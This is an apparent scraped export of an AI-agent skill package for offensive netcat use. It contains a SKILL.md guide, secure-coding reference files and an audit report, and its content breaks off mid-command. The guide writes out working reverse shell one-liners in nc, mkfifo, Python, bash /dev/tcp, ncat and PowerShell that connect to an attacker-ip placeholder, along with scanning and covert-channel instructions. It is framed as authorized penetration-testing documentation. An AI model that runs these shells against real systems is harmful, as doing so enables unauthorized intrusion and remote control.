Netcat Network Utility Overview Netcat (nc) is the "Swiss Army knife" of networking tools, providing a simple Unix utility for reading and writing data across network connections. This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing. IMPORTANT: Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission. Quick Start Basic connection and listening: Core Workflow Netcat Operations Workflow Progress: [ ] 1. Verif…

, user_id):\n    raise ValueError(\"Invalid user ID format\")\n\n# Use ORM query builders\nuser = User.query.filter_by(id=user_id).first()\n```\n\n**Step 4: Implement least privilege**\n- Database user should have minimum required permissions\n- Use read-only accounts for SELECT operations\n- Never use admin/root accounts for application queries\n\n### XSS Remediation\n\n**Step 1: Enable auto-escaping**\n- Most modern frameworks escape by default\n- Ensure auto-escaping is not disabled\n\n**Step 2: Use framework-specific safe methods**\n\n```javascript\n// React: Use JSX (auto-escapes)\n\u003cdiv>{userInput}\u003c/div>\n\n// Vue: Use template syntax (auto-escapes)\n\u003cdiv>{{ userInput }}\u003c/div>\n\n// Angular: Use property binding (auto-escapes)\n\u003cdiv [textContent]=\"userInput\">\u003c/div>\n```\n\n**Step 3: Sanitize when HTML is required**\n\n```javascript\nimport DOMPurify from 'dompurify';\n\n// Sanitize HTML content\nconst clean = DOMPurify.sanitize(userHTML, {\n  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],\n  ALLOWED_ATTR: []\n});\n```\n\n**Step 4: Content Security Policy (CSP)**\n\n```html\n\u003c!-- Add CSP header -->\nContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'\n```\n\n---\n\n## Advanced Configuration\n\nThis section contains detailed configuration options and tuning parameters.\n\n### Example: SAST Tool Configuration\n\n```yaml\n# Advanced security scanner configuration\nscanner:\n  # Severity threshold\n  severity_threshold: MEDIUM\n\n  # Rule configuration\n  rules:\n    enabled:\n      - sql-injection\n      - xss\n      - hardcoded-secrets\n    disabled:\n      - informational-only\n\n  # False positive reduction\n  confidence_threshold: HIGH\n  exclude_patterns:\n    - \"*/test/*\"\n    - \"*/tests/*\"\n    - \"*/node_modules/*\"\n    - \"*.test.js\"\n    - \"*.spec.ts\"\n\n  # Performance tuning\n  max_file_size_kb: 2048\n  timeout_seconds: 300\n  parallel_jobs: 4\n\n  # Output configuration\n  output_format: json\n  include_code_snippets: true\n  max_snippet_lines: 10\n```\n\n---\n\n## Examples and Code Samples\n\nThis section provides comprehensive code examples for various scenarios.\n\n### Example 1: Secure API Authentication\n\n```python\n# Secure API key handling\nimport hmac\nimport os\nfrom functools import wraps\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Load API key from environment (never hardcode)\nVALID_API_KEY = os.environ.get('API_KEY')\nif not VALID_API_KEY:\n    raise ValueError(\"API_KEY environment variable not set\")\n\ndef require_api_key(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        api_key = request.headers.get('X-API-Key')\n\n        if not api_key:\n            return jsonify({'error': 'API key required'}), 401\n\n        # Constant-time comparison to prevent timing attacks\n        # (compare as bytes so a non-ASCII header value cannot raise TypeError)\n        if not hmac.compare_digest(api_key.encode('utf-8'), VALID_API_KEY.encode('utf-8')):\n            return jsonify({'error': 'Invalid API key'}), 403\n\n        return f(*args, **kwargs)\n    return decorated_function\n\n@app.route('/api/secure-endpoint')\n@require_api_key\ndef secure_endpoint():\n    return jsonify({'message': 'Access granted'})\n```\n\n### Example 2: Secure Password Hashing\n\n```python\n# Secure password storage with bcrypt\nimport bcrypt\n\ndef hash_password(password: str) -> str:\n    \"\"\"Hash a password using bcrypt.\"\"\"\n    # Generate salt and hash password\n    salt = bcrypt.gensalt(rounds=12)  # Cost factor: 12 (industry standard)\n    hashed = bcrypt.hashpw(password.encode('utf-8'), salt)\n    return hashed.decode('utf-8')\n\ndef verify_password(password: str, hashed: str) -> bool:\n    \"\"\"Verify a password against a hash.\"\"\"\n    return bcrypt.checkpw(\n        password.encode('utf-8'),\n        hashed.encode('utf-8')\n    )\n\n# Usage\nstored_hash = hash_password(\"user_password\")\nis_valid = verify_password(\"user_password\", stored_hash)  # True\n```\n\n### Example 3: Secure File Upload\n\n```python\n# Secure file upload with validation\nimport os\nimport uuid\nimport magic\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}\nALLOWED_MIME_TYPES = {\n    'application/pdf',\n    'image/png',\n    'image/jpeg'\n}\nMAX_FILE_SIZE = 5 * 1024 * 1024  # 5 MB\n\ndef is_allowed_file(filename: str, file_content: bytes) -> bool:\n    \"\"\"Validate file extension and MIME type.\"\"\"\n    # Check extension\n    if '.' not in filename:\n        return False\n\n    ext = filename.rsplit('.', 1)[1].lower()\n    if ext not in ALLOWED_EXTENSIONS:\n        return False\n\n    # Check MIME type (prevent extension spoofing)\n    mime = magic.from_buffer(file_content, mime=True)\n    if mime not in ALLOWED_MIME_TYPES:\n        return False\n\n    return True\n\ndef handle_upload(file):\n    \"\"\"Securely handle file upload.\"\"\"\n    # Check file size\n    file.seek(0, os.SEEK_END)\n    size = file.tell()\n    file.seek(0)\n\n    if size > MAX_FILE_SIZE:\n        raise ValueError(\"File too large\")\n\n    # Read content for validation\n    content = file.read()\n    file.seek(0)\n\n    # Validate file type\n    if not is_allowed_file(file.filename, content):\n        raise ValueError(\"Invalid file type\")\n\n    # Sanitize filename\n    filename = secure_filename(file.filename)\n\n    # Generate unique filename to prevent overwrite attacks\n    unique_filename = f\"{uuid.uuid4()}_{filename}\"\n\n    # Save to secure location (outside web root)\n    upload_path = os.path.join('/secure/uploads', unique_filename)\n    file.save(upload_path)\n\n    return unique_filename\n```\n\n---\n\n## Best Practices for Reference Documents\n\n1. **Start with \"When to use\"** - Help Claude know when to load this reference\n2. **Include table of contents** - For documents >100 lines\n3. **Use concrete examples** - Code samples with vulnerable and fixed versions\n4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context\n5. **Provide remediation** - Don't just identify issues, show how to fix them\n6. **Organize logically** - Group related content, use clear headings\n7. **Keep examples current** - Use modern patterns and current framework versions\n8. 
**Be concise** - Even in references, challenge every sentence\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":15672,"content_sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. 
Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. 
Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. 
Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. 
**Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T15:46:45.414Z\",\n \"slug\": \"agentsecops-network-netcat\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/network-netcat\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"ac1104f74fe8a3832410ee6b9d7f337807288d8e32f873795613d7cbc4773b0f\",\n \"tree_hash\": \"1d21b3379d56d2f45414b14ce61dfeee86bce48264f8447e344af368aa0165c9\"\n },\n \"skill\": {\n \"name\": \"network-netcat\",\n \"description\": \"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. 
Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.\\n\",\n \"summary\": \"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfe...\",\n \"icon\": \"🔧\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"offsec\",\n \"tags\": [\n \"networking\",\n \"netcat\",\n \"reverse-shell\",\n \"file-transfer\",\n \"port-scanning\",\n \"banner-grabbing\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"filesystem\",\n \"env_access\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"Documentation-only skill providing educational content for authorized penetration testing. Contains no executable code, scripts, or malicious payloads. All content explicitly requires written authorization and includes cleanup guidance. 
Static findings are false positives - the analyzer detected command examples in documentation, not actual code execution.\"
\"line_start\": 137,\n \"line_end\": 137\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 6,\n \"total_lines\": 2298,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T15:46:45.414Z\"\n },\n \"content\": {\n \"user_title\": \"Use netcat for network security testing\",\n \"value_statement\": \"Security professionals need documented guidance on using netcat for authorized penetration testing, port scanning, file transfers, and reverse shell establishment. This skill provides comprehensive workflows and command references for offensive security operations with explicit authorization requirements.\",\n \"seo_keywords\": [\n \"netcat\",\n \"network security\",\n \"penetration testing\",\n \"port scanning\",\n \"reverse shell\",\n \"claude\",\n \"codex\",\n \"claude-code\",\n \"banner grabbing\",\n \"file transfer\"\n ],\n \"actual_capabilities\": [\n \"Documentation for TCP/UDP network connections and testing\",\n \"Port scanning and connectivity testing techniques\",\n \"Banner grabbing and service enumeration procedures\",\n \"Reverse shell and bind shell establishment guidance\",\n \"File transfer procedures between systems\",\n \"Relay and pivoting techniques for network movement\"\n ],\n \"limitations\": [\n \"Documentation only - provides no automated script execution\",\n \"Requires external netcat installation (netcat or ncat packages)\",\n \"All operations require explicit written authorization\",\n \"Does not include actual network exploitation tools\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Penetration testers\",\n \"title\": \"Authorized testing operations\",\n \"description\": \"Use documented netcat techniques during authorized red team engagements with proper scoping documentation.\"\n },\n {\n \"target_user\": \"Security auditors\",\n \"title\": \"Network security assessment\",\n \"description\": \"Test network 
connectivity, port availability, and firewall rules during security assessments.\"\n },\n {\n \"target_user\": \"Defensive analysts\",\n \"title\": \"Threat detection research\",\n \"description\": \"Understand attacker techniques to develop detection and monitoring capabilities for defensive security.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Basic connectivity test\",\n \"scenario\": \"Test port availability\",\n \"prompt\": \"Show me how to use netcat to test if port 80 is open on target 192.168.1.100 and verify HTTP service availability.\"\n },\n {\n \"title\": \"Banner grabbing\",\n \"scenario\": \"Service enumeration\",\n \"prompt\": \"How do I grab the SSH or SMTP banner from a target system using netcat for service enumeration?\"\n },\n {\n \"title\": \"File transfer\",\n \"scenario\": \"Restricted file movement\",\n \"prompt\": \"Document the commands to transfer a file from one system to another using netcat when standard methods are blocked.\"\n },\n {\n \"title\": \"Authorized shell\",\n \"scenario\": \"Reverse shell setup\",\n \"prompt\": \"Show netcat reverse shell techniques with proper cleanup procedures for authorized penetration testing only.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"How do I test connectivity and grab HTTP banner from a target?\",\n \"output\": [\n \"TCP connection test: nc -vz \u003ctarget-ip> \u003cport>\",\n \"HTTP banner grab: echo -e 'GET / HTTP/1.0\\\\r\\\\n\\\\r\\\\n' | nc \u003ctarget-ip> 80\",\n \"Verify written authorization before any testing\",\n \"Document all activities for compliance reporting\"\n ]\n },\n {\n \"input\": \"What are the steps for authorized reverse shell testing?\",\n \"output\": [\n \"Confirm written authorization and scope documentation\",\n \"Set up listener on attacker machine: nc -lvnp 4444\",\n \"Execute reverse shell on target (with authorization)\",\n \"Document all commands and connections\",\n \"Clean up all shells and persistence mechanisms after\"\n ]\n },\n 
{\n \"input\": \"How can I transfer files through restricted networks?\",\n \"output\": [\n \"Receiver: nc -lvnp 5555 > received_file.txt\",\n \"Sender: nc \u003creceiver-ip> 5555 \u003c file_to_send.txt\",\n \"Encrypted transfer: use ncat with --ssl option\",\n \"Verify file integrity with checksum after transfer\"\n ]\n }\n ],\n \"best_practices\": [\n \"Verify written authorization before any network testing\",\n \"Document all activities including timestamps, IPs, ports, and commands executed\",\n \"Clean up all shells, listeners, and persistence mechanisms after engagement completion\"\n ],\n \"anti_patterns\": [\n \"Using netcat techniques without proper written authorization\",\n \"Failing to document penetration testing activities and findings\",\n \"Leaving persistence mechanisms (cron jobs, services) active after engagement completion\"\n ],\n \"faq\": [\n {\n \"question\": \"Is netcat installed by default on systems?\",\n \"answer\": \"Netcat is not always pre-installed. Install with apt-get install netcat-traditional or ncat for enhanced SSL features.\"\n },\n {\n \"question\": \"What is the difference between nc and ncat?\",\n \"answer\": \"ncat (from Nmap) offers SSL encryption, connection relaying, and HTTP proxy support. Use ncat when encryption is required.\"\n },\n {\n \"question\": \"Does this skill execute any code on systems?\",\n \"answer\": \"No. This skill provides documentation and command references only. It does not contain or execute any scripts or payloads.\"\n },\n {\n \"question\": \"Can I use these techniques on any network without permission?\",\n \"answer\": \"No. All techniques require explicit written authorization. 
Unauthorized network access is illegal and unethical.\"\n },\n {\n \"question\": \"How do I detect netcat activity defensively?\",\n \"answer\": \"Monitor for nc/ncat process execution, -e flag usage, unusual outbound connections, and named pipe creation (mkfifo).\"\n },\n {\n \"question\": \"What security frameworks does this skill reference?\",\n \"answer\": \"MITRE ATT&CK techniques T1059 (Command Shell), T1071 (Application Layer Protocol), T1090 (Proxy), and T1105 (Ingress Tool Transfer).\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 567\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":35540,"content_sha256":"c5481234c5334d5c7aba4737ef83bc713e0a5dbefb8350e40348446f3e5e35f9"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Netcat Network Utility","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Netcat (nc) is the \"Swiss Army knife\" of networking tools, providing a simple Unix utility for reading and writing data across network connections. 
This skill covers authorized offensive security applications including reverse shells, bind shells, file transfers, port scanning, and banner grabbing.","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": Netcat capabilities can be used maliciously. Only use these techniques in authorized penetration testing environments with proper written permission.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Basic connection and listening:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Listen on port 4444\nnc -lvnp 4444\n\n# Connect to remote host\nnc \u003ctarget-ip> \u003cport>\n\n# Banner grab a service\necho \"\" | nc \u003ctarget-ip> 80\n\n# Simple port scan\nnc -zv \u003ctarget-ip> 1-1000","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Netcat Operations Workflow","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Verify authorization for network testing [ ] 2. Test basic connectivity and port availability [ ] 3. Perform banner grabbing and service enumeration [ ] 4. Establish reverse or bind shells (if authorized) [ ] 5. Transfer files between systems [ ] 6. Create relay and pivot connections [ ] 7. Document findings and clean up connections [ ] 8. Remove any backdoors or persistence mechanisms","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. 
Authorization Verification","type":"text"}]},{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":": Before any netcat operations:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm written authorization for network testing","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify in-scope targets and allowed activities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Understand restrictions on shell access and data exfiltration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document emergency contact procedures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm cleanup requirements post-engagement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. Basic Connectivity Testing","type":"text"}]},{"type":"paragraph","content":[{"text":"Test network connectivity and port availability:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# TCP connection test\nnc -vz \u003ctarget-ip> \u003cport>\n\n# UDP connection test\nnc -uvz \u003ctarget-ip> \u003cport>\n\n# Test port range\nnc -zv \u003ctarget-ip> 20-30\n\n# Verbose output\nnc -v \u003ctarget-ip> \u003cport>","type":"text"}]},{"type":"paragraph","content":[{"text":"Connection test results","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection succeeded","type":"text","marks":[{"type":"strong"}]},{"text":": Port is open and accepting connections","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection refused","type":"text","marks":[{"type":"strong"}]},{"text":": Port 
is closed","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection timeout","type":"text","marks":[{"type":"strong"}]},{"text":": Port is filtered by firewall or no response","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. Banner Grabbing","type":"text"}]},{"type":"paragraph","content":[{"text":"Extract service banner information:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# HTTP banner grab\necho -e \"GET / HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# SMTP banner grab\necho \"QUIT\" | nc \u003ctarget-ip> 25\n\n# FTP banner grab\necho \"QUIT\" | nc \u003ctarget-ip> 21\n\n# SSH banner grab\nnc \u003ctarget-ip> 22\n\n# Generic banner grab with timeout\ntimeout 2 nc \u003ctarget-ip> \u003cport>","type":"text"}]},{"type":"paragraph","content":[{"text":"Service-specific banner grabbing","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# MySQL banner\nnc \u003ctarget-ip> 3306\n\n# PostgreSQL banner\nnc \u003ctarget-ip> 5432\n\n# SMB/CIFS banner\nnc \u003ctarget-ip> 445\n\n# RDP banner\nnc \u003ctarget-ip> 3389","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. 
Port Scanning","type":"text"}]},{"type":"paragraph","content":[{"text":"Simple port scanning (note: nmap is more comprehensive):","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Scan single port\nnc -zv \u003ctarget-ip> 80\n\n# Scan port range\nnc -zv \u003ctarget-ip> 1-1000\n\n# Scan specific ports\nfor port in 21 22 23 25 80 443 3389; do\n nc -zv \u003ctarget-ip> $port 2>&1 | grep succeeded\ndone\n\n# Fast UDP scan\nnc -uzv \u003ctarget-ip> 53,161,500","type":"text"}]},{"type":"paragraph","content":[{"text":"Limitations of netcat port scanning","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Slower than dedicated port scanners","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Limited stealth capabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"No service version detection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Better for quick ad-hoc testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. 
Reverse Shells (Authorized Testing Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Establish reverse shell connections from target to attacker:","type":"text"}]},{"type":"paragraph","content":[{"text":"Attacker machine (listener)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Start listener\nnc -lvnp 4444\n\n# With verbose output\nnc -lvnp 4444 -v","type":"text"}]},{"type":"paragraph","content":[{"text":"Target machine (connector)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux reverse shell\nnc \u003cattacker-ip> 4444 -e /bin/bash\n\n# If -e not available (OpenBSD netcat)\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc \u003cattacker-ip> 4444 > /tmp/f\n\n# Python reverse shell\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattacker-ip>\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'\n\n# Bash reverse shell\nbash -i >& /dev/tcp/\u003cattacker-ip>/4444 0>&1\n\n# Windows reverse shell (with ncat)\nncat.exe \u003cattacker-ip> 4444 -e cmd.exe\n\n# PowerShell reverse shell\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('\u003cattacker-ip>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 